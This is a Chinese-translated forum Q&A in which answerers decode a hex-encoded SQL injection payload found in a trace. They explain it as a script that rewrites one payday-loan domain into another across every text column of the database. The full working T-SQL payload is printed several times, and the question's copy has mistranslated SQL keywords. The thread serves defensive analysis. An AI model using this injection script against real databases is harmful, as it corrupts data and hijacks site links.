我最近在SQL Profiler的帮助下在我的应用程序中找到了SQL注入的原因:
注入的语句如下:
SELECT * FROM tbl_posting_job_info其中job_posting_id = 33131声明@s的varchar(8000)组@ S =铸造(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 40542b275d20534554205b272b40432b275d3d5245504c414345285b272b40432b275d2c2027276164616d7061796461796c6f616e732e636f6d27272c202727647265777061796461796c6f616e732e636f6d272729207768657265205b272b40432b275d206c696b65202727256164616d7061796461796c6f616e732e636f6d252727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72为varchar(8000))的exec(@s)
它作为查询字符串传递。
所以有人能告诉我它的内容是什么吗?
答案 0 :(得分:2)
Exec
可以执行作为字符串传递的SQL代码。因此,攻击者把这段字符串编码成字符的十六进制形式,以降低它的可读性。把它从十六进制解码为文本后,得到:
set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'', ''drewpaydayloans.com'') where ['+@C+'] like ''%adampaydayloans.com%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
格式化版本:
-- Decoded attacker payload recovered from the hex string in the Profiler trace; kept verbatim for analysis.
-- It enumerates every text-typed column in every base table and rewrites one string into another,
-- so the impact is database-wide, not limited to tbl_posting_job_info from the original query.
-- With ANSI_WARNINGS off, truncation no longer raises an error, so the dynamic UPDATEs below
-- keep running even where REPLACE makes a value longer than its column.
SET ansi_warnings OFF
-- @T = table name and @C = column name of the current cursor row
DECLARE @T VARCHAR(255),
@C VARCHAR(255)
-- Target list: every varchar/nvarchar/text/ntext column wider than 10 characters
-- in a base table (views are excluded by table_type).
DECLARE table_cursor CURSOR FOR
SELECT c.table_name,
c.column_name
FROM information_schema.columns c,
information_schema.tables t
WHERE c.data_type IN ( 'nvarchar', 'varchar', 'ntext', 'text' )
AND c.character_maximum_length > 10
AND t.table_name = c.table_name
AND t.table_type = 'BASE TABLE'
OPEN table_cursor
FETCH next FROM table_cursor INTO @T, @C
-- Loop until the cursor is exhausted (@@FETCH_STATUS becomes non-zero)
WHILE( @@FETCH_STATUS = 0 )
BEGIN
-- One dynamic UPDATE per column: replaces every occurrence of the old domain with the new one
-- in rows that contain it. Because it is dynamic SQL, each UPDATE shows up as its own statement
-- in a Profiler/audit trace, which is what makes this pattern recognisable.
-- (The string literal below spans three source lines.)
EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+
'], ''adampaydayloans.com'', ''drewpaydayloans.com'') where ['+@C+
'] like ''%adampaydayloans.com%'' ')
FETCH next FROM table_cursor INTO @T, @C
END
-- Recovery has to consider every text column in the database, not only the table that was queried.
CLOSE table_cursor
DEALLOCATE table_cursor
答案 1 :(得分:1)
该字符串是下面这段 SQL 的十六进制编码版本:
set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'', ''drewpaydayloans.com'') where ['+@C+'] like ''%adampaydayloans.com%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
我已使用http://home.paulschou.net/tools/xlate/对其进行解码。
格式化之后,SQL代码如下:
-- Decoded payload (same script as in the other answers), shown verbatim for analysis.
-- Effect: for every base-table column of type varchar/nvarchar/text/ntext wider than 10
-- characters, run an UPDATE that swaps one domain string for another.
-- Turning ANSI_WARNINGS off stops truncation from raising an error, so the loop does not abort early.
SET ansi_warnings OFF
-- Cursor variables: @T receives the table name, @C the column name
DECLARE @T VARCHAR(255),
@C VARCHAR(255)
-- Enumerate the target columns from the catalog views; only base tables, no views.
DECLARE table_cursor CURSOR FOR
SELECT c.table_name,
c.column_name
FROM information_schema.columns c,
information_schema.tables t
WHERE c.data_type IN ( 'nvarchar', 'varchar', 'ntext', 'text' )
AND c.character_maximum_length > 10
AND t.table_name = c.table_name
AND t.table_type = 'BASE TABLE'
OPEN table_cursor
FETCH next FROM table_cursor INTO @T, @C
-- Iterate until no more rows are returned by the cursor
WHILE( @@FETCH_STATUS = 0 )
BEGIN
-- Dynamic UPDATE built from the catalog names; the string literal spans three source lines.
-- Each iteration is a separate statement in an audit/Profiler trace, one per affected column.
EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+
'], ''adampaydayloans.com'', ''drewpaydayloans.com'') where ['+@C+
'] like ''%adampaydayloans.com%'' ')
FETCH next FROM table_cursor INTO @T, @C
END
-- Cleanup of the cursor; by this point every matching column in the database has been rewritten.
CLOSE table_cursor
DEALLOCATE table_cursor
答案 2 :(得分:0)
SELECT cast(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 as varchar(8000))
的结果是:
-- Decoded payload, kept byte-for-byte as recovered from the hex string.
-- Disabling ANSI_WARNINGS keeps the UPDATEs below from failing on truncation.
set ansi_warnings off
-- @T = table name, @C = column name of the current cursor row
DECLARE @T VARCHAR(255),@C VARCHAR(255)
-- Select every text-typed column (wider than 10 chars) of every base table from the catalog.
-- Note the 'BASE TABLE' literal is split across two source lines below; that is part of the literal.
DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from
INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t
where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and
c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE
TABLE'
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
-- Loop over every (table, column) pair the cursor yields
WHILE(@@FETCH_STATUS=0)
BEGIN
-- One dynamic UPDATE per column, replacing the old domain with the new one wherever it occurs.
-- The string literal spans the next two source lines.
EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'',
''drewpaydayloans.com'') where ['+@C+'] like ''%adampaydayloans.com%'' ')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
-- Scope of impact: every matching text column in the database, not just the queried table.
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
基本上,它在数据库所有表的文本类型列中查找字符串 adampaydayloans.com,并将其替换为另一个值 drewpaydayloans.com。
答案 3 :(得分:0)
如果在db
中执行以下查询select cast(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 as varchar(8000))
你会得到
set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'', ''drewpaydayloans.com'') where ['+@C+'] like ''%adampaydayloans.com%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
在执行查询之前,您应验证 job_posting_id 是否为数字(更好的做法是使用参数化查询而不是字符串拼接),以便无法注入代码。
答案 4 :(得分:0)
使用此:
http://www.dolcevie.com/js/converter.html
传入的十六进制解码后是这样的:
-- Decoded payload (verbatim); analysis comments only, code unchanged.
-- Switching ANSI_WARNINGS off suppresses truncation errors so the UPDATE loop runs to completion.
set ansi_warnings off
-- @T = table name, @C = column name for the current cursor row
DECLARE @T VARCHAR(255),@C VARCHAR(255)
-- Target columns: varchar/nvarchar/text/ntext wider than 10 characters, base tables only.
DECLARE Table_Cursor CURSOR FOR
select c.TABLE_NAME,
c.COLUMN_NAME
from INFORMATION_SCHEMA.columns c,
INFORMATION_SCHEMA.tables t
where c.DATA_TYPE in ('nvarchar','varchar','ntext','text')
and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name
and t.table_type='BASE TABLE'
OPEN Table_Cursor
FETCH NEXT
FROM Table_Cursor
INTO @T,@C
-- Continue while the last FETCH returned a row
WHILE(@@FETCH_STATUS=0)
BEGIN
-- Dynamic UPDATE for the current column; the string literal spans the next four source lines.
-- Each executed UPDATE appears as a separate statement in an audit/Profiler trace.
EXEC(
'UPDATE ['+@T+']
SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'', ''drewpaydayloans.com'')
where ['+@C+'] like ''%adampaydayloans.com%''
')
FETCH NEXT FROM Table_Cursor
INTO @T,@C
END
-- After the loop every matching text column in the database has been modified.
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
所以看起来某个可疑的发薪日贷款网站运营者正在尝试修改数据库中所有包含竞争对手链接的 varchar/text 字段,把它们改成指向自己发薪日贷款网站的链接。